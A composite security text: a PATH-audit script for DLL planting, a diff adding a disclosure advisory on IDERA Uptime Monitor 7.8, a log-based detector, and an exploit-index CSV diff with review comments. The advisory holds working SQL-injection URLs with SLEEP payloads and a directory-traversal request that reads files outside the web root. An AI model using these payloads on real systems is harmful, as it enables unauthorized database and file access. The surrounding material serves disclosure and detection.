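The defender-side counterpart of the planting environment above is an audit of the PATH variable: which entries a low-privileged user can write to, and whether a Shcore.dll is already sitting in any PATH directory outside the system directories. This is an added example, not code from the advisory or from 360; `make_demo_env` builds a constructed sample environment (a writable "Python27"-style directory with a placeholder Shcore.dll) so the audit can be run anywhere, and the PATH separator is a parameter so the logic works off-Windows too.

```python
import os
import tempfile

# Directories where Shcore.dll legitimately lives on Windows 8.1+; anything else
# holding a file of that name is a planting candidate (assumption: a hardened
# host has no other legitimate copy).
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")


def path_entries(path_value, sep=os.pathsep):
    """Split a PATH value into non-empty, normalised directories, order kept, dupes dropped."""
    seen, out = set(), []
    for raw in path_value.split(sep):
        cleaned = raw.strip().strip('"')
        if not cleaned:
            continue
        d = os.path.normpath(cleaned)
        if d.lower() not in seen:
            seen.add(d.lower())
            out.append(d)
    return out


def is_writable_dir(d):
    """Probe by creating and removing a temp file: os.access() does not evaluate
    Windows ACLs reliably, so an actual write attempt is the honest test."""
    if not os.path.isdir(d):
        return False
    try:
        fd, name = tempfile.mkstemp(prefix=".pathaudit_", dir=d)
        os.close(fd)
        os.unlink(name)
        return True
    except OSError:
        return False


def audit_path(path_value, dll_name="Shcore.dll", sep=os.pathsep):
    """Return PATH directories the current user can write to and any copy of
    dll_name found in a PATH directory outside SYSTEM_DIRS."""
    writable, planted = [], []
    for d in path_entries(path_value, sep):
        if d.lower() in SYSTEM_DIRS:
            continue
        if is_writable_dir(d):
            writable.append(d)
        if os.path.isdir(d):
            for entry in os.listdir(d):
                if entry.lower() == dll_name.lower():
                    planted.append(os.path.join(d, entry))
    return {"writable_dirs": writable, "planted_dlls": planted}


def make_demo_env():
    """Constructed sample for the demonstration: a user-writable tool directory
    (the C:\\Python27 case from the advisory) with a planted Shcore.dll, an empty
    directory, and the real system32 path which the audit must skip."""
    root = tempfile.mkdtemp(prefix="pathaudit_")
    tools = os.path.join(root, "Python27")
    os.mkdir(tools)
    with open(os.path.join(tools, "Shcore.dll"), "wb") as f:
        f.write(b"MZ")  # placeholder bytes only, not a real DLL
    clean = os.path.join(root, "clean")
    os.mkdir(clean)
    return os.pathsep.join([tools, clean, "c:\\windows\\system32"])


if __name__ == "__main__":
    # Audit the real PATH of the current process, then the constructed sample.
    for label, value in (("PATH", os.environ.get("PATH", "")), ("demo", make_demo_env())):
        print(label, audit_path(value))
```

On a real Windows 7 host the audit should be run as the unprivileged user, since writability is what matters for that account, not for the administrator.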

File diff suppressed because it is too large.

@ -0,0 +1,269 @@
## Vulnerabilities Summary
The following advisory describes three (3) vulnerabilities found in IDERA Uptime Monitor version 7.8.
“IDERA Uptime Monitor is a Proactively monitor physical servers, virtual machines, network devices, applications, and services across multiple platforms running on-premise, remotely, or in the Cloud. Uptime Infrastructure Monitor provides a unified view of IT environment health and a GUI that is easily customizable, with a drag-and-drop dashboard design. Create private IT dashboards, team dashboards (server, application, capacity and networking teams, and even the specialist practitioner such as SharePoint farm administrators, etc.), and a network operations center (NOC) for the entire datacenter in minutes.”
The vulnerabilities found are:
SQL Injection (1)
SQL Injection (2)
Directory Traversal and File Access
## Credit
An independent security researcher has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
We notified IDERA about the vulnerabilities back in March 2017; repeated attempts to re-establish contact and get some answers on the status of the patch for these vulnerabilities went unanswered. At this time there is no solution or workaround for these vulnerabilities.
CVEs:
SQL Injection (1) CVE-2017-11470
SQL Injection (2) CVE-2017-11471
Directory Traversal and File Access CVE-2017-11469
## Vulnerabilities Details
## SQL Injection (1)
IDERA Uptime Monitor 7.8 is affected by multiple SQL injection vulnerabilities. User-controlled data is included in SQL queries made by the application without first being properly sanitized. As a result, a remote unauthenticated user can inject arbitrary SQL queries into the application's back-end database.
The SQL injection vulnerability is located in “/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php”:
```
if (isset($_GET['query_type'])) {
$query_type = $_GET['query_type'];
}
if (isset($_GET['uptime_offset'])) {
$offset = $_GET['uptime_offset'];
}
if (isset($_GET['time_frame'])) {
$time_frame = $_GET['time_frame'];
} else {
$time_frame = 3;
}
if (isset($_GET['metricType'])) {
$metricType = $_GET['metricType'];
}
if (isset($_GET['element'])) {
$vmware_object_id = $_GET['element'];
}
$json = array();
$oneElement = array();
$performanceData = array();
//date_default_timezone_set('UTC');
$db = new uptimeDB;
if ($db->connectDB()) {
echo "";
} else {
echo "unable to connect to DB exiting";
exit(1);
}
if ($query_type == "osperf-Mem") {
$min_mem_usage_array = array();
$max_mem_usage_array = array();
$avg_mem_usage_array = array();
$sql = "SELECT
e.entity_id,
e.display_name as NAME,
date(s.sample_time) as SAMPLE_TIME,
min(a.free_mem) as MIN_MEM_USAGE,
max(a.free_mem) as MAX_MEM_USAGE,
avg(a.free_mem) as AVG_MEM_USAGE,
min(c.memsize) as TOTAL_CAPACITY,
max(c.memsize),
avg(c.memsize),
day(s.sample_time),
month(s.sample_time),
year(s.sample_time)
FROM
performance_aggregate a, performance_sample s, entity e, entity_configuration c
WHERE
s.id = a.sample_id AND
s.uptimehost_id = e.entity_id AND
e.entity_id = c.entity_id AND
s.sample_time >
date_sub(now(), interval ". $time_frame . "
month) AND
e.entity_id = $vmware_object_id
GROUP BY
e.entity_id,
year(s.sample_time),
month(s.sample_time),
day(s.sample_time)
";
```
User controlled data entering the HTTP GET parameter “element” is included as part of an SQL query that is executed if the “$query_type” variable is equal to “osperf-Mem”. Because the value of the “$query_type” variable can also be set using the HTTP GET parameter “query_type”, a user can force the application to take the vulnerable code path, and execute the tainted SQL query. Visiting the following URL on a vulnerable installation will trigger the vulnerability, and return a verbose SQL error message.
```
/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php?query_type=osperf-Mem&element='
```
## Proof of Concept
```
http://192.168.199.129:9999/gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php?query_type=osperf-Mem&element=1%20AND%20SLEEP(5)
```
## SQL Injection (2)
IDERA Uptime Monitor 7.8 is affected by multiple SQL injection vulnerabilities. User-controlled data is included in SQL queries made by the application without first being properly sanitized. As a result, a remote unauthenticated user can inject arbitrary SQL queries into the application's back-end database.
The vulnerability is very similar in structure to the first SQL injection vulnerability, and is located in “/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php”:
```
if (isset($_GET['query_type'])) {
$query_type = $_GET['query_type'];
}
if (isset($_GET['uptime_offset'])) {
$offset = $_GET['uptime_offset'];
}
if (isset($_GET['time_frame'])) {
$time_frame = $_GET['time_frame'];
} else {
$time_frame = 3;
}
if (isset($_GET['metricType'])) {
$metricType = $_GET['metricType'];
}
if (isset($_GET['element'])) {
$element_id = $_GET['element'];
}
$json = array();
$oneElement = array();
$performanceData = array();
//date_default_timezone_set('UTC');
$db = new uptimeDB;
if ($db->connectDB()) {
echo "";
} else {
echo "unable to connect to DB exiting";
exit(1);
}
if ($query_type == "xenserver-Mem") {
$min_mem_usage_array = array();
$max_mem_usage_array = array();
$avg_mem_usage_array = array();
$getXenServerMemUsedsql = "SELECT
e.entity_id,
e.display_name as NAME,
date(dd.sampletime) as SAMPLE_TIME,
min(dd.value) as MIN_MEM_USAGE,
max(dd.value) as MAX_MEM_USAGE,
avg(dd.value) as AVG_MEM_USAGE,
day(dd.sampletime),
month(dd.sampletime),
year(dd.sampletime)
FROM
erdc_base b, erdc_configuration c, erdc_parameter p,
erdc_decimal_data dd, erdc_instance i, entity e
WHERE
b.name = 'XenServer'
AND
b.erdc_base_id = c.erdc_base_id AND
b.erdc_base_id = p.erdc_base_id AND
p.name = 'hostMemUsed'
AND
p.erdc_parameter_id = dd.erdc_parameter_id AND
dd.erdc_instance_id = i.erdc_instance_id AND
dd.sampletime >
date_sub(now(), interval ". $time_frame . "
month)
AND
i.entity_id = e.entity_id AND
e.entity_id = $element_id
GROUP BY
e.entity_id,
year(dd.sampletime),
month(dd.sampletime),
day(dd.sampletime)
";
```
Visiting the following URL will elicit a verbose SQL message from the vulnerable web application.
```
/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php?query_type=xenserver-Mem&time_frame=1&element='
```
## Proof of Concept
```
http://192.168.199.129:9999/gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php?query_type=xenserver-Mem&time_frame=1&element=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))tayk)
```
## Directory Traversal and File Access
User-controlled input is not sufficiently sanitized before being passed to a function responsible for accessing the filesystem. Successful exploitation of this vulnerability enables a remote unauthenticated user to read the content of any file existing on the host, including files located outside of the web root folder.
The vulnerable code can be found in the get2post.php file:
```
if(isset($_GET["file_name"]) && $_GET["file_name"] != null){
$fileName = $_GET["file_name"];
$data = file_get_contents($fileName);
$data = str_replace("\"", '"', $data);
unlink($fileName);
print("<input type=\"hidden\" name=\"script\" value=\"".$data."\">\n");
```
User-controlled data entering the HTTP GET parameter “file_name” is sanitized by removing all occurrences of the “\” character, and is then passed to the “file_get_contents” function. Next, the contents of the file (now in the $data variable) are printed in the application's HTTP response.
## Proof of Concept
The following HTTP GET request provides a proof of concept that retrieves the contents of a file named “test.txt” that exists in the root of “C:\”:
```
GET /wizards/get2post.php?file_name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5ctest.txt HTTP/1.1
Host: 192.168.199.129:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: PHPSESSID=8q7o2ckle9c6lcte045t7dufe2; cookieId=8q7o2ckle9c6lcte045t7dufe2
Connection: close
Upgrade-Insecure-Requests: 1
```
After executing this proof of concept against the vulnerable host, the following HTTP response was received, containing the contents of the “test.txt” file that was placed in the root of “C:\”:
```
HTTP/1.1 200 OK
Date: Mon, 06 Mar 2017 15:12:05 GMT
Server: Apache/2.4.20 (Win64) PHP/5.4.45 OpenSSL/1.0.2g
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 796
Connection: close
Content-Type: text/html
<html>
<head>
<title>Processing...</title>
</head>
<body onLoad="document.form.submit()">
<form name="form" action="../main.php?section=ERDCInstance&subsection=add"
method="post">
<input type="hidden" name="file_name" value="..\..\..\..\..\test.txt">
<input type="hidden" name="script"
value="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
<input type="hidden" name="category" value="agentless">
<input type="hidden" name="isWizard" value="1">
<input type="hidden" name="wizardPage" value="1">
<input type="hidden" name="wizardNumPages" value="2">
<input type="hidden" name="wizardTask" value="pageContinue">
<input type="hidden" name="visitedPage[1]" value="1">
<input type="hidden" name="fromGet2Post" value="true">
<img src="/images/InProgress.gif">
</form>
</body>
</html>
```
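As an added detection example (not from the advisory), the following Python 3 logic flags the three issues above in web-server access logs: non-numeric `element` or `time_frame` values sent to the two gadget scripts (the code above concatenates them into SQL, and legitimate values are integer ids and month counts), and traversal sequences or absolute paths in `file_name` sent to get2post.php. The access-log lines are constructed here, using the advisory's own request URLs; the assumption is a combined-style log where the request line is quoted.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameters the advisory shows being concatenated straight into SQL. Legitimate
# values are numeric (entity ids, month counts), so anything else is suspect.
NUMERIC_PARAMS = {
    "/gadgets/definitions/uptime.capacitywhatifgadget/getmetrics.php": ("element", "time_frame"),
    "/gadgets/definitions/uptime.capacitywhatifgadget/getxenmetrics.php": ("element", "time_frame"),
}
TRAVERSAL_ENDPOINT = "/wizards/get2post.php"

# Combined-style access log: only the quoted request line and status are needed.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def classify_request(target):
    """Return a list of (rule, detail) findings for one request target (path + query)."""
    parts = urlsplit(target)
    path = parts.path.lower()  # both gadget paths appear with mixed case in the advisory
    qs = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for name in NUMERIC_PARAMS.get(path, ()):
        for value in qs.get(name, []):
            if not value.isdigit():
                findings.append(("sqli-nonnumeric", "%s=%s" % (name, value)))
    if path == TRAVERSAL_ENDPOINT:
        for value in qs.get("file_name", []):
            # parse_qs decoded once; decode again so double-encoded %252e is not missed
            decoded = unquote(value)
            if ".." in decoded or decoded.startswith(("/", "\\")) or re.match(r"^[a-zA-Z]:", decoded):
                findings.append(("traversal", decoded))
    return findings


def scan_log(lines):
    """Scan access-log lines; return (line number, rule, detail) for each finding."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        for rule, detail in classify_request(m.group("target")):
            hits.append((lineno, rule, detail))
    return hits


# Constructed sample: two benign requests, then the three patterns from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Mar/2017:15:10:01 +0000] "GET /gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php?query_type=osperf-Mem&element=42 HTTP/1.1" 200 512
10.0.0.5 - - [06/Mar/2017:15:10:09 +0000] "GET /index.php HTTP/1.1" 200 2048
10.0.0.9 - - [06/Mar/2017:15:11:33 +0000] "GET /gadgets/definitions/uptime.CapacityWhatIfGadget/getmetrics.php?query_type=osperf-Mem&element=1%20AND%20SLEEP(5) HTTP/1.1" 200 128
10.0.0.9 - - [06/Mar/2017:15:11:40 +0000] "GET /gadgets/definitions/uptime.CapacityWhatifGadget/getxenmetrics.php?query_type=xenserver-Mem&time_frame=1&element=' HTTP/1.1" 500 311
10.0.0.9 - - [06/Mar/2017:15:12:05 +0000] "GET /wizards/get2post.php?file_name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5ctest.txt HTTP/1.1" 200 796
""".splitlines()

if __name__ == "__main__":
    for lineno, rule, detail in scan_log(SAMPLE_LOG):
        print("line %d: %s: %s" % (lineno, rule, detail))
```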

@ -5488,12 +5488,25 @@ id,file,description,date,author,type,platform,port
43968,exploits/php/dos/43968.py,"WordPress Core - 'load-scripts.php' Denial of Service",2018-02-05,"Barak Tawily",dos,php, 43968,exploits/php/dos/43968.py,"WordPress Core - 'load-scripts.php' Denial of Service",2018-02-05,"Barak Tawily",dos,php,
42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows, 42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows,
43972,exploits/multiple/dos/43972.txt,"Claymore Dual GPU Miner 10.5 - Format String",2018-02-05,res1n,dos,multiple,3333 43972,exploits/multiple/dos/43972.txt,"Claymore Dual GPU Miner 10.5 - Format String",2018-02-05,res1n,dos,multiple,3333
43986,exploits/hardware/dos/43986.py,"Cisco ASA - Crash PoC",2018-02-07,"Sean Dillon",dos,hardware, 43986,exploits/hardware/dos/43986.py,"Cisco ASA - Crash (PoC)",2018-02-07,"Sean Dillon",dos,hardware,
43992,exploits/multiple/dos/43992.py,"Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption",2018-02-07,"Juan Sacco",dos,multiple,2000 43992,exploits/multiple/dos/43992.py,"Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption",2018-02-07,"Juan Sacco",dos,multiple,2000
43996,exploits/android/dos/43996.txt,"Android - 'getpidcon' Permission Bypass in KeyStore Service",2018-02-07,"Google Security Research",dos,android, 43996,exploits/android/dos/43996.txt,"Android - 'getpidcon' Permission Bypass in KeyStore Service",2018-02-07,"Google Security Research",dos,android,
43998,exploits/multiple/dos/43998.txt,"Multiple OEM - 'nsd' Remote Stack Format String (PoC)",2017-12-14,bashis,dos,multiple, 43998,exploits/multiple/dos/43998.txt,"Multiple OEM - 'nsd' Remote Stack Format String (PoC)",2017-12-14,bashis,dos,multiple,
44007,exploits/macos/dos/44007.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'",2018-02-09,"Google Security Research",dos,macos, 44007,exploits/macos/dos/44007.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'",2018-02-09,"Google Security Research",dos,macos,
44035,exploits/windows/dos/44035.py,"GNU binutils 2.26.1 - Integer Overflow (POC)",2018-02-14,r4xis,dos,windows, 44035,exploits/windows/dos/44035.py,"GNU binutils 2.26.1 - Integer Overflow (PoC)",2018-02-14,r4xis,dos,windows,
44046,exploits/windows/dos/44046.md,"K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read",2017-10-23,SecuriTeam,dos,windows,
44053,exploits/linux/dos/44053.md,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,dos,linux,
44057,exploits/php/dos/44057.md,"Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service",2017-08-30,SecuriTeam,dos,php,
44075,exploits/windows/dos/44075.txt,"Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2)",2018-02-15,"Google Security Research",dos,windows,
44076,exploits/windows/dos/44076.js,"Microsoft Edge Chakra JIT - Memory Corruption",2018-02-15,"Google Security Research",dos,windows,
44077,exploits/windows/dos/44077.js,"Microsoft Edge Chakra JIT - ImplicitCallFlags Checks Bypass",2018-02-15,"Google Security Research",dos,windows,
44078,exploits/windows/dos/44078.js,"Microsoft Edge Chakra JIT - Array Type Confusion via InitProto Instructions",2018-02-15,"Google Security Research",dos,windows,
44079,exploits/windows/dos/44079.js,"Microsoft Edge Chakra JIT - 'Array.prototype.reverse' Array Type Confusion",2018-02-15,"Google Security Research",dos,windows,
44080,exploits/windows/dos/44080.js,"Microsoft Edge Chakra JIT - 'NewScObjectNoCtor' Array Type Confusion",2018-02-15,"Google Security Research",dos,windows,
44081,exploits/windows/dos/44081.js,"Microsoft Edge Chakra JIT - 'LdThis' Type Confusion",2018-02-15,"Google Security Research",dos,windows,
44082,exploits/multiple/dos/44082.txt,"Pdfium - Pattern Shading Integer Overflows",2018-02-15,"Google Security Research",dos,multiple,
44083,exploits/multiple/dos/44083.txt,"Pdfium - Out-of-Bounds Read with Shading Pattern Backed by Pattern Colorspace",2018-02-15,"Google Security Research",dos,multiple,
44084,exploits/multiple/dos/44084.js,"Chrome V8 - 'Runtime_RegExpReplace' Integer Overflow",2018-02-15,"Google Security Research",dos,multiple,
41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware, 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware,
41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows, 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows,
41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows, 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows,
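Review bot: Entry 44057 ("Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service") is filed under exploits/php/dos/ with platform "php", but the affected components named in the description are Java and Xerces; "java" or "multiple" would match the sibling Pdfium/V8 entries in this hunk, which use "multiple". Since the hunk already normalizes a description ("(POC)" to "(PoC)" on 44035), the unchanged context line for 41645 with the doubled prefix "nt!nt!HvpGetBinMemAlloc" could be corrected in the same pass.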
@ -9325,6 +9338,11 @@ id,file,description,date,author,type,platform,port
44023,exploits/linux/local/44023.rb,"Juju-run Agent - Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux, 44023,exploits/linux/local/44023.rb,"Juju-run Agent - Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
44024,exploits/linux/local/44024.rb,"glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux, 44024,exploits/linux/local/44024.rb,"glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
44025,exploits/linux/local/44025.rb,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux, 44025,exploits/linux/local/44025.rb,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
44042,exploits/windows/local/44042.md,"Hotspot Shield - Information Disclosure",2018-01-30,SecuriTeam,local,windows,
44049,exploits/linux/local/44049.md,"Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation",2017-11-23,SecuriTeam,local,linux,
44063,exploits/windows/local/44063.md,"Nitro Pro PDF - Multiple Vulnerabilities",2017-07-24,SecuriTeam,local,windows,
44064,exploits/linux/local/44064.md,"Odoo CRM 10.0 - Code Execution",2017-06-30,SecuriTeam,local,linux,
44066,exploits/windows/local/44066.md,"Dashlane - DLL Hijacking",2017-08-03,SecuriTeam,local,windows,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android, 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple, 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows, 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
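Review bot: Entry 44064 ("Odoo CRM 10.0 - Code Execution") is added as type "local" under exploits/linux/local/, while the other SecuriTeam web-application entries in this commit go under webapps; please confirm the local classification is intended rather than a misfiling. The five added rows otherwise match the hunk header (+5 lines) and keep the id/file/description/date/author/type/platform column order.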
@ -9372,7 +9390,7 @@ id,file,description,date,author,type,platform,port
41907,exploits/linux/local/41907.c,"Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config",2017-04-20,"Google Security Research",local,linux, 41907,exploits/linux/local/41907.c,"Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config",2017-04-20,"Google Security Research",local,linux,
41908,exploits/windows_x86-64/local/41908.txt,"Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation",2017-04-20,"Google Security Research",local,windows_x86-64, 41908,exploits/windows_x86-64/local/41908.txt,"Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation",2017-04-20,"Google Security Research",local,windows_x86-64,
41917,exploits/windows/local/41917.py,"Dell Customer Connect 1.3.28.0 - Local Privilege Escalation",2017-04-25,"Kacper Szurek",local,windows, 41917,exploits/windows/local/41917.py,"Dell Customer Connect 1.3.28.0 - Local Privilege Escalation",2017-04-25,"Kacper Szurek",local,windows,
41923,exploits/linux/local/41923.txt,"LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation",2017-04-25,"G. Geshev",local,linux, 41923,exploits/linux/local/41923.txt,"LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation",2017-04-25,"G. Geshev",local,linux,
41933,exploits/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",local,windows, 41933,exploits/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",local,windows,
41951,exploits/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Local Privilege Escalation",2017-05-01,"Han Sahin",local,osx, 41951,exploits/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Local Privilege Escalation",2017-05-01,"Han Sahin",local,osx,
41952,exploits/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Local Privilege Escalation",2017-05-01,"Han Sahin",local,macos, 41952,exploits/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Local Privilege Escalation",2017-05-01,"Han Sahin",local,macos,
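Review bot: The only change here is quoting 'Guest Account' in the description of 41923, which matches the identifier-quoting convention used on neighbouring entries ('AF_PACKET', 'XFRM', 'LD_AUDIT'). Because id and file are unchanged, anything downstream that keys on the description text rather than the id will see this as a new entry; keying on id avoids that.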
@ -16016,6 +16034,14 @@ id,file,description,date,author,type,platform,port
44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux, 44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux,
44027,exploits/windows/remote/44027.py,"CloudMe Sync < 1.11.0 - Buffer Overflow",2018-02-13,hyp3rlinx,remote,windows, 44027,exploits/windows/remote/44027.py,"CloudMe Sync < 1.11.0 - Buffer Overflow",2018-02-13,hyp3rlinx,remote,windows,
44031,exploits/windows/remote/44031.html,"Advantech WebAccess 8.3.0 - Remote Code Execution",2018-02-13,"Nassim Asrir",remote,windows, 44031,exploits/windows/remote/44031.html,"Advantech WebAccess 8.3.0 - Remote Code Execution",2018-02-13,"Nassim Asrir",remote,windows,
44047,exploits/linux/remote/44047.md,"Trustwave SWG 11.8.0.27 - SSH Unauthorized Access",2017-12-26,SecuriTeam,remote,linux,
44048,exploits/hardware/remote/44048.md,"Ichano AtHome IP Cameras - Multiple Vulnerabilities",2017-12-19,SecuriTeam,remote,hardware,
44052,exploits/linux/remote/44052.md,"Cisco UCS Platform Emulator 3.1(2ePE1) - Remote Code Execution",2017-11-01,SecuriTeam,remote,linux,
44055,exploits/windows/remote/44055.md,"Ikraus Anti Virus 2.16.7 - Remote Code Execution",2017-10-16,SecuriTeam,remote,windows,
44067,exploits/windows/remote/44067.md,"McAfee Security Scan Plus - Remote Command Execution",2017-07-30,SecuriTeam,remote,windows,
44068,exploits/windows/remote/44068.md,"OrientDB - Code Execution",2017-07-13,SecuriTeam,remote,windows,
44069,exploits/windows/remote/44069.md,"360 Total Security - Local Privilege Escalation",2017-07-12,SecuriTeam,remote,windows,
44073,exploits/linux/remote/44073.md,"HPE Intelligent Management Center (iMC) 7.2 (E0403P10) - Code Execution",2017-06-02,SecuriTeam,remote,linux,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows, 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows, 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
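Review bot: Entry 44069 ("360 Total Security - Local Privilege Escalation") is filed as type "remote" under exploits/windows/remote/, which contradicts its own title; it belongs with the local entries (exploits/windows/local/, type "local"), alongside 44063 and 44066 from the same source. Entry 44068 ("OrientDB - Code Execution") is given platform "windows" although nothing in the description ties it to Windows; "multiple" may be more accurate.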
@ -38044,6 +38070,24 @@ id,file,description,date,author,type,platform,port
44037,exploits/php/webapps/44037.txt,"SOA School Management - 'access_login' SQL Injection",2018-02-14,L0RD,webapps,php, 44037,exploits/php/webapps/44037.txt,"SOA School Management - 'access_login' SQL Injection",2018-02-14,L0RD,webapps,php,
44038,exploits/php/webapps/44038.txt,"userSpice 4.3 - Cross-Site Scripting",2018-02-14,"Dolev Farhi",webapps,php, 44038,exploits/php/webapps/44038.txt,"userSpice 4.3 - Cross-Site Scripting",2018-02-14,"Dolev Farhi",webapps,php,
